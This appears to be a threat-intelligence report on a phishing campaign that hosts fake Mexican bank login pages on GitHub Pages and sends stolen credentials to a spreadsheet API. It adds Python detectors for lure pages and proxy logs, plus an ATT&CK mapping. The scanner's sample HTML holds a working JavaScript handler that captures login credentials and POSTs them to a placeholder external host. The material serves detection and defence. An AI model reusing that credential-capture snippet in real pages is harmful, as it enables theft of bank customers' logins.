EXECUTIVE SUMMARY
The campaign is attributed to a financially motivated threat group that has built a modular phishing infrastructure focused on Mexico's banking and finance sector. Using the trusted reputation of GitHub Pages, the actors host counterfeit login portals that imitate at least a dozen institutions. The operation has persisted for several years, indicating a well‐maintained service. Their primary objective is credential theft, enabling account takeover, unauthorized transactions, and resale of personal banking data.
Targeted entities span local banks, multinational subsidiaries, and related financial service providers across the region. Victims receive malicious URLs through SMS, messaging apps, or email, which direct them to GitHub‐hosted pages that faithfully replicate bank login screens. Embedded JavaScript intercepts form submissions, packages entered credentials into JSON, and forwards them via HTTPS POST to a public spreadsheet‐as‐a‐service API. Because the exfiltration endpoint resides in a cloud service, attackers avoid maintaining any dedicated servers, allowing rapid redeployment of compromised repositories after takedown.
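The interception pattern described above (a submit handler that serialises the form to JSON and POSTs it to another origin) is something a triage analyst can check for statically when a reported GitHub Pages URL comes in. The scanner below is an added example written for this page, not code from the report or from the threat actor; the page URL, the sample HTML and the spreadsheet-API host name are constructed placeholders, and the regexes only cover the plain `fetch()` and `XMLHttpRequest.open('POST', ...)` forms, not obfuscated variants.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a minimal lookalike login page of the kind the report describes.
# Not a real phishing page; both host names below are placeholders chosen for this example.
SAMPLE_PAGE_URL = "https://example-user.github.io/banco-login/"
SAMPLE_HTML = """
<form id="login"><input name="user"><input name="pass" type="password"></form>
<script>
document.getElementById('login').addEventListener('submit', function (e) {
  e.preventDefault();
  var payload = JSON.stringify({u: this.user.value, p: this.pass.value});
  fetch('https://sheet-api.example.net/v1/tables/abc123/rows', {method: 'POST', body: payload});
  window.location = 'https://www.legit-bank.example/';
});
</script>
"""

# Constructed benign control: a login form that posts to its own origin via a relative URL.
BENIGN_HTML = """
<form id="login"><input name="user"><input name="pass" type="password"></form>
<script>
document.getElementById('login').addEventListener('submit', function (e) {
  e.preventDefault();
  fetch('/api/login', {method: 'POST', body: new FormData(this)});
});
</script>
"""

# A submit handler is attached either via addEventListener('submit', ...) or onsubmit=.
SUBMIT_HOOK = re.compile(r"addEventListener\(\s*['\"]submit['\"]|onsubmit\s*=", re.I)
# Absolute URLs handed to fetch() or to XMLHttpRequest.open('POST', ...).
FETCH_URL = re.compile(r"fetch\(\s*['\"](https?://[^'\"]+)['\"]", re.I)
XHR_OPEN = re.compile(r"\.open\(\s*['\"]POST['\"]\s*,\s*['\"](https?://[^'\"]+)['\"]", re.I)
PASSWORD_FIELD = re.compile(r"<input[^>]+type\s*=\s*['\"]?password", re.I)


def find_cross_origin_posts(page_url, html):
    """Return absolute fetch/XHR targets whose host differs from the page's own host."""
    page_host = urlparse(page_url).hostname
    targets = FETCH_URL.findall(html) + XHR_OPEN.findall(html)
    return sorted({t for t in targets if urlparse(t).hostname != page_host})


def score_page(page_url, html):
    """Flag a page as suspicious when it has a password field, hooks form submission,
    and sends data to a different origin than the one serving the page."""
    findings = []
    if PASSWORD_FIELD.search(html):
        findings.append("password_field")
    if SUBMIT_HOOK.search(html):
        findings.append("submit_handler")
    if "JSON.stringify" in html:
        findings.append("json_packaging")
    exfil_targets = find_cross_origin_posts(page_url, html)
    if exfil_targets:
        findings.append("cross_origin_post")
    required = {"password_field", "submit_handler", "cross_origin_post"}
    return {
        "suspicious": required <= set(findings),
        "findings": findings,
        "exfil_targets": exfil_targets,
    }


if __name__ == "__main__":
    for label, html in (("lure", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(label, score_page(SAMPLE_PAGE_URL, html))
```

The cross-origin check is what separates a lookalike from a genuine bank page: a real login form posts to the bank's own origin, while a GitHub Pages lure has no backend of its own and must ship the credentials somewhere else. The hosts it ships them to are the indicators worth extracting for blocking and for the proxy-side detection discussed next.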
Harvested data is stored in real‐time spreadsheets, where operators can download or forward it for account takeover, fraud, or resale on underground markets. The threat is significant because it exploits a reputable hosting platform, making malicious URLs appear legitimate and bypassing many traditional perimeter controls. Absence of a persistent backend complicates takedown, while real‐time credential exfiltration leaves little chance for victims to detect compromise before fraud occurs. Organizations should reinforce user education to recognize suspicious links, enforce multi‐factor authentication, and implement network monitoring that flags outbound POST requests to unknown spreadsheet services. Deploying web filtering, regularly reviewing domain reputation, and maintaining robust incident‐response playbooks will reduce exposure and accelerate recovery if credentials are leaked.
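The monitoring recommendation above, flagging outbound POSTs to spreadsheet services, works best when the POST is correlated with the lure visit that preceded it, since a spreadsheet API POST on its own is common in legitimate traffic. The detector below is an added example written for this page, not the report's own detection content. The proxy log lines are constructed, the `sheet-api.example.net` host is a placeholder (sheets.googleapis.com is Google's real Sheets API endpoint), and the allowed-referer list is an assumption about where an organisation's legitimate spreadsheet traffic originates.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed proxy log in a simple space-separated format:
# timestamp client method url status bytes referer ("-" when absent)
SAMPLE_LOG = """\
2024-03-04T10:01:05Z 10.0.4.21 GET https://example-user.github.io/banco-login/ 200 8123 -
2024-03-04T10:01:49Z 10.0.4.21 POST https://sheet-api.example.net/v1/tables/abc123/rows 200 212 https://example-user.github.io/banco-login/
2024-03-04T10:03:10Z 10.0.4.37 GET https://docs.google.com/spreadsheets/d/xyz 200 15000 -
2024-03-04T10:05:00Z 10.0.4.37 POST https://sheets.googleapis.com/v4/spreadsheets/xyz/values:append 200 300 https://docs.google.com/
2024-03-04T11:20:00Z 10.0.4.50 POST https://sheet-api.example.net/v1/tables/q9/rows 200 180 -
"""

# Spreadsheet-as-a-service API hosts to watch. Extend with whatever your intel feed lists.
SPREADSHEET_HOSTS = ("sheets.googleapis.com", "sheet-api.example.net")
# Referers from which legitimate spreadsheet API traffic is expected (assumed for this example).
ALLOWED_REFERERS = ("docs.google.com",)
# Hosting platforms the report associates with the lure pages.
LURE_HOST_SUFFIXES = (".github.io",)

LINE = re.compile(r"^(\S+) (\S+) (GET|POST|PUT) (\S+) (\d+) (\d+) (\S+)$")


def _in(host, names):
    """True if host equals one of names or is a subdomain of it."""
    return any(host == n or host.endswith(n if n.startswith(".") else "." + n) for n in names)


def parse(log_text):
    """Parse the constructed log format into time-ordered event dicts."""
    events = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        ts, client, method, url, _status, _size, referer = m.groups()
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "client": client,
            "method": method,
            "url": url,
            "host": urlparse(url).hostname or "",
            "referer_host": (urlparse(referer).hostname or "") if referer != "-" else "",
        })
    events.sort(key=lambda e: e["ts"])
    return events


def detect(log_text, window=timedelta(minutes=15)):
    """Alert on POST/PUT to a spreadsheet API host.

    high:   the same client fetched a lure-hosting site within `window`, or the
            request's referer is such a site (the report's credential-exfil pattern).
    medium: spreadsheet API write with no allowed referer and no lure context.
    Writes whose referer is an allowed host are treated as expected business use.
    """
    alerts = []
    last_lure_visit = {}
    for e in parse(log_text):
        if e["method"] == "GET" and _in(e["host"], LURE_HOST_SUFFIXES):
            last_lure_visit[e["client"]] = e["ts"]
            continue
        if e["method"] not in ("POST", "PUT") or not _in(e["host"], SPREADSHEET_HOSTS):
            continue
        recent = last_lure_visit.get(e["client"])
        from_lure = _in(e["referer_host"], LURE_HOST_SUFFIXES) or (
            recent is not None and e["ts"] - recent <= window
        )
        if from_lure:
            alerts.append({"client": e["client"], "url": e["url"], "severity": "high",
                           "reason": "spreadsheet API write right after visiting a lure-hosting site"})
        elif _in(e["referer_host"], ALLOWED_REFERERS):
            continue
        else:
            alerts.append({"client": e["client"], "url": e["url"], "severity": "medium",
                           "reason": "spreadsheet API write with no expected referer"})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a["severity"], a["client"], a["url"], "-", a["reason"])
```

Because the exfiltration goes over HTTPS, a proxy only sees the method, host and referer unless it performs TLS inspection, which is why the detector keys on request metadata and on the GET-then-POST sequence rather than on the JSON body. A high-severity hit is a credential-reset and fraud-monitoring trigger for that user, not just a block.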
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Resource Development | T1583.006 | Acquire Infrastructure | Web Services |
| Initial Access | T1566.002 | Phishing | Spearphishing Link |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Exfiltration | T1567 | Exfiltration Over Web Service | — |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
REFERENCES:
The following report contains further technical details:
https://www.group-ib.com/blog/gitbait-phishing-mexico-banking-finance/